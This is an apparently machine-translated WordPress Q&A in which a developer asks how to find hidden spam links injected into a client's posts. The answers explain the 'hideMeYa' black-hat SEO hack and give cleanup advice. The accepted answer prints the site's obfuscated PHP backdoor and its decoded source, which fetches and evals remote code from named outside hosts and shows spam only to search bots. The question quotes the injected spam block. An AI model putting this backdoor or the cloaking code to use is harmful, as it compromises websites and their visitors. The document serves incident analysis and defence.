查找注入到内容中的垃圾链接的提示

时间:2014-02-16 作者:emersonthis

我在一个客户的网站上工作,我注意到帖子有一个隐藏的<div> 填充到dick pills等的垃圾邮件链接。为了运气好,我在数据库表中搜索了一些关键字,但没有找到匹配项。我还搜索了所有文件中的代码,也没有找到匹配项。

我知道Wordpress黑客可能很难删除,而且他们会竭尽全力使其难以找到。但也许有一些“常见的嫌疑犯”我可以检查,或者也许有一些我可以寻找的告密迹象。

I\'m not asking for anyone to solve this specific hack. 我只是想知道(总体上)应该去哪里找。

如果有用的话,这是未经授权的<div> 在第一个<\\p>:

<div id=\'hideMeya\'> At that requires looking for how you http://www.cialis.com <a href="http://wwxcashadvancecom.com/" title="want $745? visit our site.">want $745? visit our site.</a> sign any of money. Visit our secure bad creditors that cialis levitra sales viagra <a href="http://www10525.c3viagra10.com/" title="viagra australia online">viagra australia online</a> payday lenders know otherwise. But the black you stay on discount price levitra <a href="http://www10385.x1cialis10.com/" title="what is impotence in men">what is impotence in men</a> duty to their lives. Citizen at one online or after receiving their research viagra online <a href="http://www10675.80viagra10.com/" title="www.viagra.com">www.viagra.com</a> to just take just wait until monday. This specifically relates to shop every pay stubs get viagra without prescription <a href="http://www10154.40cialis10.com/" title="cialis overnight delivery">cialis overnight delivery</a> and only used or faxing required. We will turn double checked by some small business loans viagra for woman <a href="http://www10077.x1cialis10.com/" title="cialis india">cialis india</a> sites that works the business before approval. Living paycheck went out cash there would generate levitra <a href="http://www10450.a1viagra10.com/" title="viagra cialis levitra">viagra cialis levitra</a> the scheduled maturity day method. Own a short application on when money also buy cialis online <a href="http://buy4kamagra.com/" title="kamagra">kamagra</a> plenty of personal initial limits. Even those loans quick because lenders realize http://cialis-ca-online.com <a href="http://levitra4au.com/" title="levitrafroaustraila">levitrafroaustraila</a> you notice a payday advance. A loan applications are more common thanks http://www.cialis2au.com/ <a href="http://buy-7cialis.com/" title="cialis">cialis</a> to only apply online website. Third borrowers will use your paycheck to levitra online pharmacy <a href="http://www10675.30viagra10.com/" title="viagra online purchase">viagra online purchase</a> utilize these individuals can cover. Often there must also referred to ensure online pharmacy viagra usa <a href="http://www10600.90viagra10.com/" title="viagra effectiveness">viagra effectiveness</a> you with financial expenses. Thanks to checking account also merchant cash loan wwwwviagracom.com <a href="http://www10075.90viagra10.com/" title="levitra viagra cialis">levitra viagra cialis</a> comparison to state or from there. At that they pay them in mere viagra <a href="http://www10225.30viagra10.com/" title="cheapest generic viagra">cheapest generic viagra</a> seconds and to comprehend. If a repossession or limited to see if approved www.cashadvances.com  | Apply for a cash advance online! <a href="http://www10385.70cialis10.com/" title="cialis dosage">cialis dosage</a> the risks associated at your current address. Second borrowers should not start and struggle http://www.cashadvance.com <a href="http://levitra-online-ca.com/" title="levitra for sale">levitra for sale</a> at least a button. Thanks to send the benefits of everyday living cheapest viagra order online <a href="http://www10462.70cialis10.com/" title="tadalafil">tadalafil</a> from being foreclosed on its benefits. Finally you get help rebuild the original loan buy cialis viagra <a href="http://viagra5online.com/" title="viagra without prescription">viagra without prescription</a> can really only to surprises. Bank loans out you will take http://wviagracom.com/ <a href="http://www10539.40cialis10.com/" title="erectile dysfunction supplements">erectile dysfunction supplements</a> the conditions are a. Bills might provide an unexpected car cialis uk suppliers <a href="http://kamagra-ca-online.com/" title="kamagra">kamagra</a> broke a repayment length. Third borrowers repay because payday industry has the results http://www.buy9levitra.com/ <a href="http://www10075.20viagra10.com/" title="viagra recreational use">viagra recreational use</a> by the middle man and check process. After verifying your question with dignity and credit cards www.levitra.com <a href="http://www10300.b2viagra10.com/" title="overnight viagra delivery">overnight viagra delivery</a> or drive to secure loan online. Most people for dollars you between bad and free cialis <a href="http://viagra7au.com/" title="http://viagra7au.com/">http://viagra7au.com/</a> instead these applicants is available. Social security against your payday the larger sums buying viagra online <a href="http://payday7online.com/" title="direct lenders installment loans no credit check">direct lenders installment loans no credit check</a> of gossip when working telephone calls. Face it provides hour payday industry levitra online <a href="http://www10150.30viagra10.com/" title="buy viagra now">buy viagra now</a> has high credit score? Within minutes during your best score range from http://cashadvance8online.com <a href="http://www10450.60viagra10.com/" title="viagra dosage instructions">viagra dosage instructions</a> fees if there for them most. To avoid paperwork you in crisis arise from wwwpaydayloancom.com | Online Payday Loans application form! <a href="http://www10225.80viagra10.com/" title="super active viagra">super active viagra</a> online from paying the bank? Funds will know to throwing your cash advance no credit check <a href="http://orderviagrauaonline.com/" title="viagara online">viagara online</a> finances there that purse. Companies realize that asks for which can become cialis online <a href="http://www10375.60viagra10.com/" title="sublingual viagra">sublingual viagra</a> eligible to paycheck some lenders. Medical bills that be much easier than actually need only online cash advance <a href="http://cashadvance8online.com" title="online cash advance">online cash advance</a> your funds via the freedom you out.  </div><script type=\'text/javascript\'>if(document.getElementById(\'hideMeya\') != null){document.getElementById(\'hideMeya\').style.visibility = \'hidden\';document.getElementById(\'hideMeya\').style.display = \'none\';}</script> </p>

2 个回复
最合适的回答,由SO网友:emersonthis 整理而成

我不会重复斯奎什回答中的任何好建议。您还应该阅读this article on Wordpress security. 我只想讲述一下我从这一集中学到的细节。

我的攻击是一种被称为“hideMeYa”的黑帽SEO:http://siteolytics.com/black-hat-seo-technique-demystified/

基本上,攻击者会在内容中插入一堆隐藏的链接,这样人类就看不到它们,但谷歌可以。因此,他们利用毫无戒心的网站收集到可疑网站的反向链接。

很难说这是怎么做到的,但在这个网站上有两个已知的安全漏洞:

管理员用户仍在使用中(您应该删除/重命名管理员用户)

<?php $wp_function_initialize = create_function(\'$a\',strrev(\';)a$(lave\')); $wp_function_initialize(strrev(\';))"=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"(edoced_46esab(lave\'));?><?php
请注意,它的名称非常巧妙,看起来像典型的Wordpress内容。

我不会遍历所有的代码,但基本上base64_encode将代码转换为反向字符串。这个strrev() 很难在这里找到两个最大的危险信号:base64_encodeeval. 下面包含了未混淆的代码,但这里是我最大的收获(除了Squish所说的):

小心evalbase64_decode, but also look for 其反向等价物:laveedoced_46esabstrrev. 在WP core中,很少有合法的使用所有这些会返回误报,但不是太多,以至于您无法仔细检查每一个

未混淆的代码是:

function get_url_999($url){$content="";$content=@trycurl_999($url);if($content!==false)return $content;$content=@tryfile_999($url);if($content!==false)return $content;$content=@tryfopen_999($url);if($content!==false)return $content;$content=@tryfsockopen_999($url);if($content!==false)return $content;$content=@trysocket_999($url);if($content!==false)return $content;return \'\';}
function trycurl_999($url){if(function_exists(\'curl_init\')===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result=="")return false;return $result;}
function tryfile_999($url){if(function_exists(\'file\')===false)return false;$inc=@file($url);$buf=@implode(\'\',$inc);if ($buf=="")return false;return $buf;}
function tryfopen_999($url){if(function_exists(\'fopen\')===false)return false;$buf=\'\';$f=@fopen($url,\'r\');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;}
function tryfsockopen_999($url){if(function_exists(\'fsockopen\')===false)return false;$p=@parse_url($url);$host=$p[\'host\'];$uri=$p[\'path\'].\'?\'.$p[\'query\'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\\n";$request.="Host: $host\\n\\n";fwrite($f,$request);$buf=\'\';while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}
function trysocket_999($url){if(function_exists(\'socket_create\')===false)return false;$p=@parse_url($url);$host=$p[\'host\'];$uri=$p[\'path\'].\'?\'.$p[\'query\'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\\n";$request.="Host: $host\\n\\n";socket_write($sock,$request);$buf=\'\';while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}
function str_replace_first($search, $replace, $subject) {$pos = stripos($subject, $search);if ($pos !== false) {    $subject = substr_replace($subject, $replace, $pos, strlen($search));}  return $subject;}
function is_bot_ua(){$bot=0;$ua=@$_SERVER[\'HTTP_USER_AGENT\'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"googlebot"))$bot=1;return $bot;}
function is_googlebot_ip(){$k=0;$ip=sprintf("%u",@ip2long(@$_SERVER["REMOTE_ADDR"]));if (($ip>=1123631104)&&($ip<=1123639295))$k=1;return $k;}

function update_file_999(){

    $uri="g.php?t=p&i=7dbdd7b4";
    $actual1="http://nlinthewood.com/".$uri;
    $actual2="http://maxigg.ru/".$uri;
    $val=get_url_999($actual1);
    if ($val=="")$val=get_url_999($actual2);
    if (strstr($val,"|||CODE|||")){
        list($val,$code)=explode("|||CODE|||",$val);
        eval(base64_decode($code));
    }
    return $val;
}



function callback_function_php($p) {

    if (isset($_COOKIE[\'wordpress_test_cookie\']) || isset($_COOKIE[\'wp-settings-1\']) || isset($_COOKIE[\'wp-settings-time-1\']) || (function_exists(\'is_user_logged_in\') && is_user_logged_in()) ) {
        return $p;
    }

    $x=\'{options_names}\';
    $buf="";
    $update=0;
    if (!$k = get_option($x)){
        if (!add_option($x,Array(),\'\',\'no\')){
            return $p;
        }
        $update=1;
    }else{
        $ctime=time()-@$k[1];
        if ($ctime>3600*12){
            $update=1;
        }

    }
    if ($update){
        $val=update_file_999();
        $k=array();
        $k[0]=$val;
        $k[1]=time();
        if (!update_option($x,$k)){
            return $p;
        }
    }
    if (!$k = get_option($x)){
        return $p;
    }

    $buf=@$k[0];
    if ($buf==""){
        return $p;
    }
    list($type,$text)=@explode("|||",$buf);
    if ($text=="")return $p;

    $type+=0;
    $bot=0;
    if ($type==0){
        $buf1=@base64_decode($text);
        list($tagjs,$js,$tagtext1,$text1)=@explode("|||",$buf1);

        if (($tagjs!="")&&(stristr($p,$tagjs))){
            $p=str_replace_first($tagjs, $js." ".$tagjs, $p);
        }else{
            $p=$p.$js;
        }
        if (($tagtext1!="")&&(stristr($p,$tagtext1))){
            $p=str_replace_first($tagtext1, $text1." ".$tagtext1, $p);
        }else{
            $p=$p.$text1;
        }

    }else
    if (($type==1)||($type==2)||($type==3)||($type==4)){
        if (($type==1)||($type==4)){
            $bot=is_bot_ua();
        }
        if (($type==2)||($type==3)){
            $bot=is_googlebot_ip();
        }

        if ($bot){
            $buf1=@base64_decode($text);
            list($tag,$text1)=@explode("|||",$buf1);
            if (($tag!="")&&($text1!="")){

                if (stristr($p,$tag)){
                    if (($type==3)||($type==4)){
                        $p=@str_ireplace($tag,$tag." ".$text1,$p); 
                    }else{
                        $p=str_replace_first($tag, $tag." ".$text1, $p);
                    }
                }else{
                    $p=$p.$text1;
                }
            }

        }
    }


    return $p; 
} 



ob_start("callback_function_php");

SO网友:Squish

In general, the best place to look is in your theme folders, specifically the main theme and in the index.php file. Then the footer and header files.

Also, check your modified dates and start with the most recently modified. Especially if there are several that were all modified around the same date/time.

我已经在人们的服务器上多次看到并不得不修复此问题。错误数据通常通过插入模板php文件的脚本加载。

首先,你应该仔细阅读Wordpress FAQ for dealing with a hacked site.

获取完成注入所需的“访问”的常见入口点是过时的主题和/或插件。最好在服务器上只运行一个活动主题的生产服务器,并删除未使用的插件和替换过时的活动插件。

有一些脚本可以上传到服务器,帮助您查找受感染的文件,以便替换、清理或删除它们。(下面列出的链接)

再次尝试查看文件修改日期,并查看您最近没有修改/安装但在上有最近日期的文件。

  • Look for Bad Guys : 我用过这个。需要一系列配置才能根除所有误报。。。但它至少可以帮助您大致了解要签出哪些文件
  • Wordfence 提供了使用免费插件扫描文件的功能,但我个人无法认可,因为我自己还没有使用过https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/Sucuri经常在Wordpress论坛上链接,他们也有一个用于扫描的插件,但再一次。。。没有亲自使用过。但我是一个动手的人

结束
标签: security   spam   hacked   小码农  

相关推荐

Esc_html__security:在本例中用于什么?

如何esc_html__ (第二个)保护$message 被黑客攻击的变量?在这里使用这种保护有什么意义(第二种是纯文本保护)?<?php function unknown(){ /* If the user input any text, escape it. */ if ( !empty ( $_POST[\'unknown\'] ) ) $message = esc_html ( $_POST[\'unknow